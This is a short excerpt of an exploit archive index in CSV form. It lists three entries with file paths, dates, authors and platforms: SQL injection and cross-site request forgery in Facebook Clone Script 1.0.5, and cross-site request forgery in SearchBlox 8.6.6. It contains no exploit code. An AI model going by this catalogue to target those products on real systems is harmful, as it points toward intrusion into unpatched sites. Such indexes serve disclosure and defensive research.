44799,exploits/php/webapps/44799.txt,"Facebook Clone Script 1.0.5 - 'search' SQL Injection",2018-05-29,L0RD,webapps,php,
44800,exploits/php/webapps/44800.txt,"Facebook Clone Script 1.0.5 - Cross-Site Request Forgery",2018-05-29,L0RD,webapps,php,
44801,exploits/java/webapps/44801.txt,"SearchBlox 8.6.6 - Cross-Site Request Forgery",2018-05-30,"Ahmet Gurel",webapps,java,

Can't render this file because it is too large.